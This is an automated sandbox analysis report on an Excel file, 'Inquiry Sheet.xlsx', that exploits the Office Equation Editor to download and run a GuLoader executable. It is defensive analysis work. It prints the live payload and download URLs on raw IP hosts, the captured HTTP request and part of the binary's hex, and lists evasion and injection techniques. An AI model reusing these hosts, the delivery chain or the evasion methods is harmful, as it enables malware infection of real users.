Loading ...

Play interactive tourEdit tour

Windows Analysis Report Inquiry Sheet.xlsx

Overview

General Information

Sample Name:Inquiry Sheet.xlsx
Analysis ID:482488
MD5:b079763f132db9b4d979256a28909892
SHA1:3f8ef9821671cbc8267baa2c6e9a41a18af45f78
SHA256:71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2604 cmdline: 'C:\Users\Public\vbc.exe' MD5: B7E5ACDADE5630DBF1AB4B211DDC16DB)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 212.192.246.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2604
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2604

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Inquiry Sheet.xlsxReversingLabs: Detection: 26%
    Antivirus detection for URL or domainShow sources
    Source: http://212.192.246.25/excel/vbc.exeAvira URL Cloud: Label: malware
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 17%
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 17%
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 68MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://37.0.11.217/WEALTHYREM_ecI
    Source: Joe Sandbox ViewASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:16:54 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Sun, 12 Sep 2021 22:03:18 GMTETag: "22000-5cbd38416fb31"Accept-Ranges: bytesContent-Length: 139264Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 98 6b 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 01 00 00 90 00 00 00 00 00 00 bc 14 00 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 02 00 00 10 00 00 5c 62 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c8 01 00 28 00 00 00 00 20 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 bd 01 00 00 10 00 00 00 c0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 58 45 00 00 00 d0 01 00 00 10 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 20 02 00 00 40 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /excel/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: BEC4B86A.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /excel/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326928
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00323431
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A439
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A42B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032441B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032700F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032247B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325063
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00320C67
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325C67
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A467
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032AC6F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00323C6C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032B444
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003244AC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00323897
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032B498
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325885
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329088
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003238E6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032B4E4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003270D8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A92B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00320D2C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326110
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032491E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A51F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00321504
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325508
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329176
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325967
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325168
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032195B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329D5B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325D58
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00324548
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003211B3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003215B7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003271A4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032559E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00320D82
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003229FE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003255FE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003245D0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A5D1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003239C3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003269C1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00322A39
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032B61F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00322E00
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00320A79
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325260
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325E65
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329A5E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032AA40
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325A4A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032324A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00321248
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326649
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032164F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A24C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003232A8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003266AC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A69A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00320A8A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032268D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032B2F3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326EFC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003216E0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003226E6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003256D0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A2D7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326EC1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00323AC8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329B34
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326F39
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032532A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00325B77
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032436B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032B358
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A341
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00321347
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A3B8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003237B9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003233A2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003237A0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003257A6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00324F91
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032B39C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00323B83
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00323BF7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00329BF4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003253F9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003213ED
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003217D0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0032A7CC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326928 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003269C1 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326A91 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00326B75 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: Inquiry Sheet.xlsxReversingLabs: Detection: 26%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Inquiry Sheet.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE407.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/27@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00402B34 push esi; retn 000Ch
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405C5A pushad ; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00407D62 push edi; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00408701 push esi; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0040631B push es; iretd
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00409134 push ebp; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004089D5 push eax; ret
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405F90 push ds; retf
    Source: C:\Users\Public\vbc.exeCode function: 6_2_003242B8 pushad ; retf
    Source: initial sampleStatic PE information: section name: .text entropy: 7.07203430098
    Source: initial sampleStatic PE information: section name: .text entropy: 7.07203430098
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
